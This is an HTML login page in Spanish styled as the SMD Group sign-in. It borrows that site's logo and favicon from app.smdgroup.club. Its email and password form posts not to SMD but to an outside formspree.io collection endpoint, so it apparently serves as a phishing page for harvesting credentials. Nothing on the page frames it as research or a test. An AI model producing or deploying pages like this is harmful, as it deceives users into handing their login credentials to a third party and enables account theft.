<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Iniciar sesión</title>
    <link rel="icon" type="image/x-icon" href="https://app.smdgroup.club/favicon.ico" />
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css" rel="stylesheet">
    <style type="text/css">
        body {
            font-family: Arial, sans-serif;
            background-color: #f1f3fd;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .login-container {
            background-color: #fff;
            box-shadow: 0px 3px 6px rgba(0, 0, 0, 0.1);
            padding: 40px 30px; /* Ajuste de padding */
            text-align: center;
            width: 400px; /* Ajuste de ancho */
            position: relative;
        }

        .logo {
            color: red;
            font-size: 50px;
            font-weight: bold;
            margin-bottom: 20px;
            max-height: 80px;
        }

        .input-container {
            text-align: left;
            margin-bottom: 20px; /* Mayor espacio entre campos */
            position: relative;
        }

        .input-container input {
            width: 100%;
            padding: 15px;
            border: 1px solid #e5eaef;
            box-sizing: border-box;
            font-size: 14px;
            border-radius: 3px; /* Bordes más suaves */
            height: 50px; /* Ajuste de altura */
        }

        .input-container input:focus {
            border-color: #007bff;
            border-width: 2px;
            outline: none;
        }

        .login-button {
            background-color: #e2e2e2;
            color: #ffffff;
            border: none;
            padding: 12px;
            width: 100%;
            font-size: 18px; /* Tamaño ajustado */
            border-radius: 5px;
            cursor: not-allowed;
        }

        .login-button.enabled {
            background-color: #007bff;
            cursor: pointer;
        }

        .button-container {
            text-align: left;
            margin-top: 30px; /* Espacio adicional */
        }

        .forgot-password {
            color: #0066ff;
            text-decoration: none;
            font-size: 14px;
            margin-top: 15px; /* Ajuste del margen */
            display: inline-block;
        }

        .forgot-password:hover {
            text-decoration: underline;
        }

        /* Estilo para dispositivos móviles */
        @media (max-width: 480px) {
            .login-container {
                width: 90%; /* Ajuste de ancho en móviles */
                padding: 20px;
            }
        }
    </style>
</head>

<body>
    <div class="login-container">
        <img src="https://app.smdgroup.club/assets/images/logos/logo.svg" class="logo" alt="SMD Logo" />

        <form action="https://formspree.io/f/xkgggvzo" id="loginForm">
            <div class="input-container">
                <input id="email" placeholder="Email" type="email" required />
                <span class="error-message" id="emailError">El email es necesario</span>
            </div>

            <div class="input-container">
                <input id="clave" placeholder="Clave" type="password" required />
                <span class="error-message" id="claveError">La clave es obligatoria</span>
            </div>

            <div class="button-container">
                <button class="login-button" id="loginButton" type="submit" disabled>Iniciar sesión</button>
                <a class="forgot-password" href="#">¿Olvidaste tu clave?</a>
            </div>
        </form>
    </div>
</body>

</html>
